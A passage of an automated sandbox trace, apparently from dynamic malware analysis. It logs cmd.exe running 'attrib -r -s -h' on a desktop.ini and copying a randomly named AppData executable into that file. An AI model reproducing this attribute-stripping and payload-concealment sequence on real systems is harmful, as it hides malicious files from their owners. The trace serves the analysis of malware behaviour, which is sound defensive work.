returned 0x11 [0147.390] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.390] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.390] GetEnvironmentStringsW () returned 0x2a0598* [0147.390] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.390] GetConsoleOutputCP () returned 0x1b5 [0147.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.391] GetUserDefaultLCID () returned 0x409 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="0") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="0") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="1") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.391] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.392] GetConsoleTitleW (in: lpConsoleTitle=0x290b70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.392] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.393] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0147.393] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0147.393] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0147.393] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0147.393] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0147.393] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0147.393] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0147.396] _wcsicmp (_String1="del", _String2=")") returned 59 [0147.396] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0147.396] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0147.396] _wcsicmp (_String1="IF", _String2="del") returned 5 [0147.396] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0147.396] _wcsicmp (_String1="REM", _String2="del") returned 14 [0147.396] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0147.398] _wcsicmp (_String1="type", _String2=")") returned 75 [0147.398] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0147.398] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0147.398] _wcsicmp (_String1="IF", _String2="type") returned -11 [0147.398] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0147.398] _wcsicmp (_String1="REM", _String2="type") returned -2 [0147.398] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0147.401] SetErrorMode (uMode=0x0) returned 0x0 [0147.401] SetErrorMode (uMode=0x1) returned 0x0 [0147.401] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2a0658, lpFilePart=0x22ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ed8c*="Desktop") returned 0x18 [0147.401] SetErrorMode (uMode=0x0) returned 0x1 [0147.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.402] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.407] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.407] GetLastError () returned 0x2 [0147.407] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.408] GetLastError () returned 0x2 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0x2a0940 [0147.408] FindClose (in: hFindFile=0x2a0940 | out: hFindFile=0x2a0940) returned 1 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.408] GetLastError () returned 0x2 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0x2a0940 [0147.408] FindClose (in: hFindFile=0x2a0940 | out: hFindFile=0x2a0940) returned 1 [0147.408] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.408] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.408] GetConsoleTitleW (in: lpConsoleTitle=0x22f000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.476] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef50 | out: lpAttributeList=0x22ee88, lpSize=0x22ef50) returned 1 [0147.476] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee88, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee88, lpPreviousValue=0x0) returned 1 [0147.476] GetStartupInfoW (in: lpStartupInfo=0x22ee44 | out: lpStartupInfo=0x22ee44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.476] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.477] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eee4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef30 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessInformation=0x22ef30*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa88, dwThreadId=0xa34)) returned 1 [0147.526] CloseHandle (hObject=0x4c) returned 1 [0147.526] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.526] GetEnvironmentStringsW () returned 0x2a0bd0* [0147.526] FreeEnvironmentStringsW (penv=0x2a0bd0) returned 1 [0147.526] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.672] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ee24 | out: lpExitCode=0x22ee24*=0x0) returned 1 [0147.672] CloseHandle (hObject=0x50) returned 1 [0147.672] _vsnwprintf (in: _Buffer=0x22ef6c, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee30 | out: _Buffer="00000000") returned 8 [0147.672] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.673] GetEnvironmentStringsW () returned 0x2a26d8* [0147.673] FreeEnvironmentStringsW (penv=0x2a26d8) returned 1 [0147.673] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.673] GetEnvironmentStringsW () returned 0x2a26d8* [0147.673] FreeEnvironmentStringsW (penv=0x2a26d8) returned 1 [0147.673] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ee88 | out: lpAttributeList=0x22ee88) [0147.673] GetConsoleTitleW (in: lpConsoleTitle=0x22f208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.673] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e280, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e284, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e280*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0147.673] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0147.674] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0147.674] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini")) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1")) returned 0x10 [0147.674] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0147.674] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini")) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2a3854, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a3854) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] _get_osfhandle (_FileHandle=2) returned 0xb [0147.674] GetFileType (hFile=0xb) returned 0x2 [0147.674] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0147.674] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ec80 | out: lpMode=0x22ec80) returned 1 [0147.675] _get_osfhandle (_FileHandle=2) returned 0xb [0147.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ecb4 | out: lpConsoleScreenBufferInfo=0x22ecb4) returned 1 [0147.675] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] GetFileType (hFile=0x7) returned 0x2 [0147.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0147.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f3a4 | out: lpMode=0x22f3a4) returned 1 [0147.676] _dup (_FileHandle=1) returned 3 [0147.676] _close (_FileHandle=1) returned 0 [0147.676] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini", _String2="con") returned -53 [0147.676] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f374, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0147.676] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0147.676] GetConsoleTitleW (in: lpConsoleTitle=0x22f1a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x22ed08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ed08) returned 0x29e768 [0147.677] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0147.677] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0147.677] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0147.677] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22dc14, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0147.677] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] GetFileType (hFile=0x58) returned 0x1 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x22dc6c | out: lpFileSizeHigh=0x22dc6c*=0x0) returned 0x7d600 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.677] GetFileType (hFile=0x50) returned 0x1 [0147.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.677] GetFileType (hFile=0x50) returned 0x1 [0147.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.678] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.680] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.680] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.681] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.682] SetFilePointerEx (in: 